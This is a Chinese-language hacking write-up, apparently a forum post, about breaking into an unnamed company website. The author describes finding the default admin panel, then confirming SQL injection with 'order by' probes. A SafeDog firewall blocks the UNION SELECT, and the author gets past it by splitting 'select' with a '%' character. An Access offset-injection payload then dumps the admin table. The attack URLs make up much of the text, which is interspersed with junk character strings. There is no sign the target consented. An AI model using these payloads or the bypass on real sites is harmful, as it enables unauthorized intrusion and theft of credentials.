打开网站,一个企业站。1 `9 M8 R, V7 e# o8 X2 J( _
3 S+ P/ d7 c1 h; X" L9 i' W4 b0 i8 Z' \
顺手加个admin
8 Z+ y3 I+ b1 s# g# I! I1 }6 e& o9 |/ E- R3 t; H
$ n# G! T/ f" I2 E
默认后台。* O* Y3 D W8 j1 N
回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。
# I8 J! p, W$ G0 z% N+ v
7 t( v% J) N2 \: E- u+ d3 u, p8 u& W
/ P+ z% y0 K2 `+ o! m& _5 |所以就不用御剑扫了,待会直接封IP。
) T' Q9 Z; ~4 A, R% l+ D) ^ 7 I- R% X5 m3 x1 u- d% t' n
用order by语句判断是否存在注入。7 Q5 D) }" B! F+ l
http://www.xxx.com /product_show.asp?id=997 order by 1
4 D) n; E6 v& t( nhttp://www.xxx.com /product_show.asp?id=997 order by 100$ p: q# A! k% f! y1 l0 c' a
现在存在注入,经测试后发现是9个字段。* G8 @. n! |' c0 l" \: l g8 P( _+ J4 A
* v. @: z e/ `% I$ Z3 I接下来进行联合查询,猜是否存在admin表。
% p6 k5 F! ` A, ghttp://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。( j3 a) I0 u1 y/ y+ f
) o S0 L' l- P" {/ [3 Q
. v0 o' X5 ?, j v: L5 J4 y ^& T, g. }: S: z n3 }3 f# l( t& [* x
在select中间加个%,se%lect绕过安全狗。
1 O' J2 H. a; R4 t r4 Y ?: C8 U: P% s6 m, V1 Z
7 Y B( @$ A, E发现存在admin表,然后开始手工猜常用的字段。
6 w6 @- g/ P2 {3 C0 _$ p纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。% j- n5 H/ @/ d: E) x& [ X
' Z, K* V8 q% V! u" D2 P突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。
' ?6 ~ a& E1 Y, E8 i7 t
/ q2 B) E" ?0 {+ f: P科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。1 b; c2 M. S, U$ W8 }$ E/ d
http://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin
$ }! C& c* N& D好了,敏感内容出显了。
0 q$ y9 } |& }) L5 S7 e: Y, g) \" J% N) _7 i7 C5 Y
7 W+ S$ ]$ j! v' l5 C! r+ {- b+ D* m6 j4 x }. R# Y" ~. Z' b& N) R% ~
|